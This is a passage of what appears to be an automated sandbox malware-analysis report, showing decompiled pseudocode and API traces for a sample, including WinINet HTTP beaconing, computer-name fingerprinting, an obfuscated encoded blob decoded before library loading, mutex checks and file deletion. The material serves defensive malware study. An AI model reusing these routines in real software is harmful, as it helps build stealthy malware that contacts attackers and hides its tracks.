                  				void* _t2;
                  				int _t3;
                  				void* _t4;
                  				void* _t10;
                  				void* _t12;
                  				void* _t14;
                  
                  				_t1 = CreateFileW(0x416c50, 0x80000000, 1, 0, 3, 0, 0); // executed
                  				_t14 = _t1;
                  				if(_t14 != 0xffffffff) {
                  					_t2 = CreateFileMappingW(_t14, 0, 2, 0, 0, 0); // executed
                  					_t12 = _t2;
                  					if(_t12 != 0) {
                  						_t4 = MapViewOfFile(_t12, 4, 0, 0, 0); // executed
                  						_t10 = _t4;
                  						if(_t10 != 0) {
                  							 *0x41574c = RtlComputeCrc32(0, _t10, GetFileSize(_t14, 0));
                  							UnmapViewOfFile(_t10);
                  						}
                  						CloseHandle(_t12); // executed
                  					}
                  					_t3 = CloseHandle(_t14); // executed
                  					return _t3;
                  				}
                  				return _t1;
                  			}

                  APIs
                  • CreateFileW.KERNEL32(00416C50,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                  • GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                  • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                  • UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                  • CloseHandle.KERNEL32(00000000), ref: 0040F42D
                  • CloseHandle.KERNEL32(00000000), ref: 0040F434
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleView$ComputeCrc32MappingSizeUnmap
                  • String ID:
                  • API String ID: 3664593344-0
                  • Opcode ID: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction ID: 4f8756942f13f85b051569e497b215ae0a3eeb64e29cb283b43bbd1ff795de01
                  • Opcode Fuzzy Hash: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction Fuzzy Hash: F60131B22007187FF2211FA4ACCDFFB656CDB85B9BF108135FA11A12D0DAA44D014679
                  Uniqueness

                  Uniqueness Score: 0.14%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0040140A(WCHAR* __ecx, short __edx, void* __eflags, WCHAR* _a4, WCHAR* _a8, void* _a16, long _a20, intOrPtr _a24) {
                  				WCHAR* _v8;
                  				WCHAR* _v12;
                  				void* _v16;
                  				WCHAR* _t15;
                  				void* _t16;
                  				void* _t19;
                  				long _t22;
                  				int _t26;
                  				void* _t28;
                  				short _t30;
                  				void* _t31;
                  				void* _t32;
                  				void* _t43;
                  				WCHAR* _t45;
                  				WCHAR* _t46;
                  				void* _t47;
                  
                  				_t30 = __edx;
                  				_v8 = __ecx;
                  				_t15 = E00401345(); // executed
                  				_t45 = 0;
                  				_t46 = _t15;
                  				_v12 = _t46;
                  				_t16 = InternetOpenW(_t46, 0, 0, 0, 0); // executed
                  				_v16 = _t16;
                  				if(_t16 != 0) {
                  					_t19 = InternetConnectW(_t16, _v8, _t30, 0, 0, 3, 0, 0); // executed
                  					_t31 = _t19;
                  					_v8 = _t31;
                  					if(_t31 != 0) {
                  						_t47 = E00401A52(0x412050, 0x42b61fdb);
                  						_t22 = E00401310();
                  						_t37 =  !=  ? _t47 : 0;
                  						_t32 = HttpOpenRequestW(_t31,  !=  ? _t47 : 0, _a4, 0, 0, 0, _t22, 0);
                  						L00401B09(_t47);
                  						if(_t32 != 0) {
                  							_t26 = HttpSendRequestW(_t32, _a8, 0xffffffff, _a16, _a20); // executed
                  							if(_t26 != 0) {
                  								_t43 = 0x13;
                  								_t28 = E00401316(_t32, _t43);
                  								_t54 = _t28 - 0xc8;
                  								if(_t28 == 0xc8) {
                  									_t45 = E00401383(_t32, _a24, _t54);
                  								}
                  							}
                  							InternetCloseHandle(_t32); // executed
                  						}
                  						InternetCloseHandle(_v8);
                  						_t46 = _v12;
                  					}
                  					InternetCloseHandle(_v16);
                  				}
                  				E00401532(_t46);
                  				return _t45;
                  			}

                  APIs
                    • Part of subcall function 00401345: ObtainUserAgentString.URLMON(00000000,?,00000104), ref: 00401362
                  • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00401429
                  • InternetConnectW.WININET(00000000,00000000,A8020050,00000000,00000000,00000003,00000000,00000000), ref: 00401445
                  • HttpOpenRequestW.WININET(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401480
                  • HttpSendRequestW.WININET(00000000,000000FF,000000FF,?,?), ref: 0040149F
                  • InternetCloseHandle.WININET(00000000), ref: 004014C7
                    • Part of subcall function 00401316: HttpQueryInfoW.WININET(00000000,00000013,00000000,00000000,00000000), ref: 00401334
                    • Part of subcall function 00401383: InternetReadFile.WININET(?,00000000,00000000,?), ref: 004013CD
                  • InternetCloseHandle.WININET(?), ref: 004014D0
                  • InternetCloseHandle.WININET(?), ref: 004014DC
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequest$AgentConnectFileInfoObtainQueryReadSendStringUser
                  • String ID:
                  • API String ID: 3982590236-0
                  • Opcode ID: 0d54c19cca61c3b923c66ea9474d8b0119caa62e74d77989c331ed76ff960556
                  • Instruction ID: de09d5a240a5615813d0bbbfcfa054314b958373cb91725100eb0eecfb42de7b
                  • Opcode Fuzzy Hash: 0d54c19cca61c3b923c66ea9474d8b0119caa62e74d77989c331ed76ff960556
                  • Instruction Fuzzy Hash: 9E216271A00245FBDF206FA69C49DAF7ABDDBC5760B10813EB905A23A1DA788D508B64
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  C-Code - Quality: 39%
                  			E0040F2EE(void* __eflags) {
                  				char _v524;
                  				char _v1044;
                  				short _v1564;
                  				char* _t17;
                  				int _t27;
                  				void* _t45;
                  				intOrPtr _t48;
                  
                  				_t42 = E00401A52(0x412a00, 0x4bf67e71);
                  				E0040F190( &_v1044, _t9);
                  				L00401B09(_t42);
                  				_push( &_v524);
                  				_push(0);
                  				_push(0);
                  				_t48 =  *0x415f4c; // 0x1
                  				if(_t48 == 0) {
                  					 *0x414c14(0, 0x1c);
                  					_t43 = E00401A52(0x412df0, 0x4bf67e71);
                  					_t17 =  &_v524;
                  					 *0x4143a4(_t17, 0x104, _t15, _t17,  &_v1044);
                  					_t45 = _t45 + 0x14;
                  					L00401B09(_t43);
                  				} else {
                  					 *0x414c14(0, 0x29);
                  				}
                  				_t44 = E00401A52(0x412bb0, 0x4bf67e71);
                  				 *0x4143a4( &_v1564, 0x104, _t20,  &_v524,  &_v1044);
                  				L00401B09(_t44);
                  				_t27 = DeleteFileW( &_v1564); // executed
                  				return _t27;
                  			}

                  APIs
                    • Part of subcall function 0040F190: lstrlenW.KERNEL32(00000000,00000000,00000000,00000104,?,?,0040F111), ref: 0040F1A1
                  • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,?), ref: 0040F33C
                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040F347
                  • _snwprintf.NTDLL ref: 0040F36C
                  • _snwprintf.NTDLL ref: 0040F3A1
                  • DeleteFileW.KERNEL32(?), ref: 0040F3B8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf$DeleteFilelstrlen
                  • String ID: g8Cw
                  • API String ID: 1341198303-3103284439
                  • Opcode ID: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction ID: 657008bbddd63c106de985fdb09df341ec56487ec0cf543515cc0156050913b4
                  • Opcode Fuzzy Hash: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction Fuzzy Hash: 5C11B7B1A001189BC720E7619C449EB726DDB84355F0440BBF90AE3291EE385E858BED
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 99 40f43e-40f45c GetComputerNameW 100 40f4c8 99->100 101 40f45e-40f498 call 4019ab WideCharToMultiByte call 401b09 99->101 102 40f4ce-40f503 call 4019ab _snprintf call 401b09 100->102 101->100 111 40f49a-40f4a1 101->111 111->102 112 40f4a3-40f4a7 111->112 113 40f4a9-40f4ab 112->113 114 40f4ad-40f4af 112->114 113->114 115 40f4c0-40f4c4 113->115 116 40f4b1-40f4b3 114->116 117 40f4b5-40f4b7 114->117 115->112 120 40f4c6 115->120 116->115 116->117 118 40f4b9-40f4bb 117->118 119 40f4bd 117->119 118->115 118->119 119->115 120->102
                  C-Code - Quality: 82%
                  			E0040F43E(void* __ebx) {
                  				long _v8;
                  				char _v24;
                  				short _v56;
                  				int _t14;
                  				void* _t15;
                  				int _t22;
                  				char _t24;
                  				char* _t33;
                  
                  				_v8 = 0x10;
                  				_t14 = GetComputerNameW( &_v56,  &_v8); // executed
                  				if(_t14 == 0) {
                  					L12:
                  					_v24 = 0x58;
                  					L13:
                  					_t15 = E004019AB(0x412e30);
                  					 *0x414664("813848_3C4E0000", 0x104, _t15,  &_v24,  *0x4164e0);
                  					return L00401B09(_t15);
                  				}
                  				_t22 = WideCharToMultiByte(0, 0x400,  &_v56, 0xffffffff,  &_v24, 0x10, E004019AB(0x412b90), 0);
                  				L00401B09(_t19);
                  				if((0 | _t22 > 0x00000000) == 0) {
                  					goto L12;
                  				}
                  				_t33 =  &_v24;
                  				if(_v24 == 0) {
                  					goto L13;
                  				} else {
                  					goto L3;
                  				}
                  				do {
                  					L3:
                  					_t24 =  *_t33;
                  					if(_t24 < 0x30 || _t24 > 0x39) {
                  						if(_t24 < 0x61 || _t24 > 0x7a) {
                  							if(_t24 < 0x41 || _t24 > 0x5a) {
                  								 *_t33 = 0x58;
                  							}
                  						}
                  					}
                  					_t33 = _t33 + 1;
                  				} while ( *_t33 != 0);
                  				goto L13;
                  			}

                  APIs
                  • GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                  • _snprintf.NTDLL ref: 0040F4EF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide_snprintf
                  • String ID: 813848_3C4E0000$X
                  • API String ID: 4080658169-2762417543
                  • Opcode ID: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction ID: dbbf294783a5ce5e9b0548ade1bddf9532166b7a22268ff85b9ccd314504079c
                  • Opcode Fuzzy Hash: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction Fuzzy Hash: D5115B719011086ADB30DA699D01BEB37AC9B11708F50113BEC45F12D1E77C8A0A83EE
                  Uniqueness

                  Uniqueness Score: 12.89%

                  C-Code - Quality: 100%
                  			E0040C601(void* __eflags) {
                  				void* _t1;
                  				long _t3;
                  				void* _t4;
                  				long _t8;
                  				int _t13;
                  
                  				_t13 = 0; // executed
                  				_t1 = E0040C4F5(__eflags); // executed
                  				if(_t1 == 0) {
                  					L10:
                  					return _t13;
                  				}
                  				_t3 = WaitForSingleObject( *0x41548c, 0);
                  				if(_t3 == 0) {
                  					L3:
                  					_t4 = E0040C54E(_t17); // executed
                  					_t18 = _t4;
                  					if(_t4 != 0 && E0040C5A7(_t18) != 0) {
                  						_t8 = SignalObjectAndWait( *0x414e6c,  *0x41365c, 0xffffffff, _t13);
                  						if(_t8 == 0 || _t8 == 0x80) {
                  							_t13 = ResetEvent( *0x414e6c);
                  						}
                  					}
                  					ReleaseMutex( *0x41548c);
                  					CloseHandle( *0x41548c); // executed
                  					L9:
                  					goto L10;
                  				}
                  				_t17 = _t3 - 0x80;
                  				if(_t3 != 0x80) {
                  					goto L9;
                  				}
                  				goto L3;
                  			}

                  APIs
                    • Part of subcall function 0040C4F5: _snwprintf.NTDLL ref: 0040C51D
                    • Part of subcall function 0040C4F5: CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040C535
                  • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040C615
                  • SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0040C649
                  • ResetEvent.KERNEL32(?,?,0040F111), ref: 0040C65D
                  • ReleaseMutex.KERNEL32(?,?,0040F111), ref: 0040C66B
                  • CloseHandle.KERNEL32 ref: 0040C677
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: MutexObjectWait$CloseCreateEventHandleReleaseResetSignalSingle_snwprintf
                  • String ID:
                  • API String ID: 2255288334-0
                  • Opcode ID: 53fec47dd3a6376ce4d8dbe922b21d1394a5889b4255efbee4863a382fe81091
                  • Instruction ID: c0f7c5306684621e6a4500821fb11e6ef7d6b4f9c1040e922aa21da158988458
                  • Opcode Fuzzy Hash: 53fec47dd3a6376ce4d8dbe922b21d1394a5889b4255efbee4863a382fe81091
                  • Instruction Fuzzy Hash: 6AF03631544110DBDF312F76FC48A9A7A55AB45752714C736F801E12F0EA36C9109A5C
                  Uniqueness

                  Uniqueness Score: 0.01%

                  C-Code - Quality: 81%
                  			E00408922(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				char _v388;
                  				struct HINSTANCE__* _t99;
                  
                  				_v388 = 0xbe363562;
                  				_v384 = 0x358c1795;
                  				_v380 = 0xfc3978bd;
                  				_v376 = 0x5e88d697;
                  				_v372 = 0x1994d9f1;
                  				_v368 = 0x74012195;
                  				_v364 = 0x24e0d58c;
                  				_v360 = 0x21725a8d;
                  				_v356 = 0xa874821;
                  				_v352 = 0x8f4bb96f;
                  				_v348 = 0x7b30fa17;
                  				_v344 = 0x7ea7edad;
                  				_v340 = 0x48c44d52;
                  				_v336 = 0x2e75da4f;
                  				_v332 = 0x5ea70e4c;
                  				_v328 = 0x7310b874;
                  				_v324 = 0x673afa7a;
                  				_v320 = 0x7d7fe55;
                  				_v316 = 0x71d3ba3c;
                  				_v312 = 0x27174315;
                  				_v308 = 0xffc65c5a;
                  				_v304 = 0x71edd81f;
                  				_v300 = 0x88b5759d;
                  				_v296 = 0xa46eb22d;
                  				_v292 = 0x4e080454;
                  				_v288 = 0x773882f0;
                  				_v284 = 0x301340;
                  				_v280 = 0x27b6a846;
                  				_v276 = 0xd1630644;
                  				_v272 = 0x4beaf5bf;
                  				_v268 = 0x430858d;
                  				_v264 = 0xf02d0ada;
                  				_v260 = 0x21f77905;
                  				_v256 = 0xebc6db18;
                  				_v252 = 0x25fcc715;
                  				_v248 = 0x1f40551f;
                  				_v244 = 0xd9b12e44;
                  				_v240 = 0x41ea523d;
                  				_v236 = 0xeff774de;
                  				_v232 = 0x7e0b9da5;
                  				_v228 = 0x8adb486a;
                  				_v224 = 0xf7243b6d;
                  				_v220 = 0x2b80910;
                  				_v216 = 0xca5e3015;
                  				_v212 = 0x635d5a6e;
                  				_v208 = 0x46d9f790;
                  				_v204 = 0xd87c8cb3;
                  				_v200 = 0x3b391a04;
                  				_v196 = 0x80154553;
                  				_v192 = 0x26d9aa35;
                  				_v188 = 0xa780316d;
                  				_v184 = 0xcc58666d;
                  				_v180 = 0x1546d742;
                  				_v176 = 0xb874fe62;
                  				_v172 = 0x7dab30d9;
                  				_v168 = 0xae3670f3;
                  				_v164 = 0x2d39e7a8;
                  				_v160 = 0xc90b32b4;
                  				_v156 = 0xf86c708b;
                  				_v152 = 0x3d938887;
                  				_v148 = 0x857eaf68;
                  				_v144 = 0x4675d760;
                  				_v140 = 0x91021cb0;
                  				_v136 = 0x1e139331;
                  				_v132 = 0x9c4df91c;
                  				_v128 = 0xbf70c7da;
                  				_v124 = 0x1868d50e;
                  				_v120 = 0xaaeeea7a;
                  				_v116 = 0x676c626a;
                  				_v112 = 0x459ef5d;
                  				_v108 = 0xf6552739;
                  				_v104 = 0x628c522d;
                  				_v100 = 0x5094f550;
                  				_v96 = 0xdc8a394;
                  				_v92 = 0x753b5f8f;
                  				_v88 = 0xbcfd75c5;
                  				_v84 = 0xc39d1db2;
                  				_v80 = 0xfc32ffd;
                  				_v76 = 0xd8b5f26a;
                  				_v72 = 0xad049b88;
                  				_v68 = 0xaacdb83e;
                  				_v64 = 0x7a9519fc;
                  				_v60 = 0xa3bb9731;
                  				_v56 = 0x4be3cd7a;
                  				_v52 = 0xeb2ea36c;
                  				_v48 = 0xec09d4a5;
                  				_v44 = 0xf4140a91;
                  				_v40 = 0xb1a460b0;
                  				_v36 = 0x6fde7de0;
                  				_v32 = 0x1da135a9;
                  				_v28 = 0x1a3a8662;
                  				_v24 = 0xfe2095d7;
                  				_v20 = 0xf2fd9e2f;
                  				_v16 = 0xe2f8a12;
                  				_v12 = 0x2f79a8a3;
                  				_v8 = 0x33205105;
                  				_t107 = E00401A52(0x412780, 0x72fc3a35);
                  				_t99 = LoadLibraryW(_t98); // executed
                  				 *0x4164f0 = _t99;
                  				L00401B09(_t107);
                  				_push(0x413660);
                  				_push(0x3ccd278a);
                  				return E004012FF( *0x4164f0,  &_v388, 0x60);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 00408C9E
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: =RA$jblg$nZ]c
                  • API String ID: 1029625771-130541845
                  • Opcode ID: 1b1ed6e085e12f066a49fdef08a2a82bb6068c6974effbf6941084d5ca8307fb
                  • Instruction ID: e7cc7c87ab767eb4a20ce2cf539689b4304f70dc4dd1bc1fd0241874581f8c7a
                  • Opcode Fuzzy Hash: 1b1ed6e085e12f066a49fdef08a2a82bb6068c6974effbf6941084d5ca8307fb
                  • Instruction Fuzzy Hash: 9081C6B4C06368DBEB21DF8699857CDBB70FB45704F6086C8C2693B214DB304A86CF99
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 82%
                  			E0040F43E(void* __ebx) {
                  				long _v8;
                  				char _v24;
                  				short _v56;
                  				int _t14;
                  				void* _t15;
                  				int _t22;
                  				char _t24;
                  				char* _t33;
                  
                  				_v8 = 0x10;
                  				_t14 = GetComputerNameW( &_v56,  &_v8); // executed
                  				if(_t14 == 0) {
                  					L12:
                  					_v24 = 0x58;
                  					L13:
                  					_t15 = E004019AB(0x412e30);
                  					 *0x414664(0x416738, 0x104, _t15,  &_v24,  *0x4164e0);
                  					return L00401B09(_t15);
                  				}
                  				_t22 = WideCharToMultiByte(0, 0x400,  &_v56, 0xffffffff,  &_v24, 0x10, E004019AB(0x412b90), 0);
                  				L00401B09(_t19);
                  				if((0 | _t22 > 0x00000000) == 0) {
                  					goto L12;
                  				}
                  				_t33 =  &_v24;
                  				if(_v24 == 0) {
                  					goto L13;
                  				} else {
                  					goto L3;
                  				}
                  				do {
                  					L3:
                  					_t24 =  *_t33;
                  					if(_t24 < 0x30 || _t24 > 0x39) {
                  						if(_t24 < 0x61 || _t24 > 0x7a) {
                  							if(_t24 < 0x41 || _t24 > 0x5a) {
                  								 *_t33 = 0x58;
                  							}
                  						}
                  					}
                  					_t33 = _t33 + 1;
                  				} while ( *_t33 != 0);
                  				goto L13;
                  			}

                  APIs
                  • GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                  • _snprintf.NTDLL ref: 0040F4EF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide_snprintf
                  • String ID: X
                  • API String ID: 4080658169-3081909835
                  • Opcode ID: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction ID: dbbf294783a5ce5e9b0548ade1bddf9532166b7a22268ff85b9ccd314504079c
                  • Opcode Fuzzy Hash: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction Fuzzy Hash: D5115B719011086ADB30DA699D01BEB37AC9B11708F50113BEC45F12D1E77C8A0A83EE
                  Uniqueness

                  Uniqueness Score: 0.17%

                  C-Code - Quality: 39%
                  			E0040F2EE(void* __eflags) {
                  				char _v524;
                  				char _v1044;
                  				short _v1564;
                  				char* _t17;
                  				int _t27;
                  				void* _t45;
                  				intOrPtr _t48;
                  
                  				_t42 = E00401A52(0x412a00, 0x4bf67e71);
                  				E0040F190( &_v1044, _t9);
                  				L00401B09(_t42);
                  				_push( &_v524);
                  				_push(0);
                  				_push(0);
                  				_t48 =  *0x415f4c; // 0x0
                  				if(_t48 == 0) {
                  					 *0x414c14(0, 0x1c);
                  					_t43 = E00401A52(0x412df0, 0x4bf67e71);
                  					_t17 =  &_v524;
                  					 *0x4143a4(_t17, 0x104, _t15, _t17,  &_v1044);
                  					_t45 = _t45 + 0x14;
                  					L00401B09(_t43);
                  				} else {
                  					 *0x414c14(0, 0x29);
                  				}
                  				_t44 = E00401A52(0x412bb0, 0x4bf67e71);
                  				 *0x4143a4( &_v1564, 0x104, _t20,  &_v524,  &_v1044);
                  				L00401B09(_t44);
                  				_t27 = DeleteFileW( &_v1564); // executed
                  				return _t27;
                  			}











                  APIs
                    • Part of subcall function 0040F190: lstrlenW.KERNEL32(00000000,00000000,00000000,00000104,?,?,0040F111), ref: 0040F1A1
                  • _snwprintf.NTDLL ref: 0040F36C
                  • _snwprintf.NTDLL ref: 0040F3A1
                  • DeleteFileW.KERNEL32(?), ref: 0040F3B8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf$DeleteFilelstrlen
                  • String ID: g8Cw
                  • API String ID: 3875729096-3103284439
                  • Opcode ID: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction ID: 657008bbddd63c106de985fdb09df341ec56487ec0cf543515cc0156050913b4
                  • Opcode Fuzzy Hash: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction Fuzzy Hash: 5C11B7B1A001189BC720E7619C449EB726DDB84355F0440BBF90AE3291EE385E858BED
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 73%
                  			E0040140A(WCHAR* __ecx, short __edx, void* __eflags, intOrPtr _a4, WCHAR* _a8, void* _a16, long _a20, intOrPtr _a24) {
                  				WCHAR* _v8;
                  				WCHAR* _v12;
                  				void* _v16;
                  				WCHAR* _t15;
                  				void* _t16;
                  				void* _t19;
                  				void* _t21;
                  				int _t26;
                  				void* _t28;
                  				short _t30;
                  				void* _t31;
                  				void* _t32;
                  				void* _t43;
                  				WCHAR* _t45;
                  				WCHAR* _t46;
                  				void* _t47;
                  
                  				_t30 = __edx;
                  				_v8 = __ecx;
                  				_t15 = E00401345(); // executed
                  				_t45 = 0;
                  				_t46 = _t15;
                  				_v12 = _t46;
                  				_t16 = InternetOpenW(_t46, 0, 0, 0, 0); // executed
                  				_v16 = _t16;
                  				if(_t16 != 0) {
                  					_t19 = InternetConnectW(_t16, _v8, _t30, 0, 0, 3, 0, 0); // executed
                  					_t31 = _t19;
                  					_v8 = _t31;
                  					if(_t31 != 0) {
                  						_t21 = E00401A52(0x412050, 0x42b61fdb);
                  						_t47 = _t21;
                  						_t37 =  !=  ? _t47 : 0;
                  						_t32 =  *0x415bc8(_t31,  !=  ? _t47 : 0, _a4, 0, 0, 0, E00401310(), 0);
                  						L00401B09(_t47);
                  						if(_t32 != 0) {
                  							_t26 = HttpSendRequestW(_t32, _a8, 0xffffffff, _a16, _a20); // executed
                  							if(_t26 != 0) {
                  								_t43 = 0x13;
                  								_t28 = E00401316(_t32, _t43);
                  								_t54 = _t28 - 0xc8;
                  								if(_t28 == 0xc8) {
                  									_t45 = E00401383(_t32, _a24, _t54);
                  								}
                  							}
                  							InternetCloseHandle(_t32); // executed
                  						}
                  						 *0x4158d8(_v8);
                  						_t46 = _v12;
                  					}
                  					 *0x4158d8(_v16);
                  				}
                  				E00401532(_t46);
                  				return _t45;
                  			}




















                  APIs
                    • Part of subcall function 00401345: ObtainUserAgentString.URLMON(00000000,?,00000104), ref: 00401362
                  • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000,0040C6FC,00000000,00000104,?,?,?), ref: 00401429
                  • InternetConnectW.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00401445
                  • HttpSendRequestW.WININET(00000000,000000FF,000000FF,?,?), ref: 0040149F
                  • InternetCloseHandle.WININET(00000000), ref: 004014C7
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
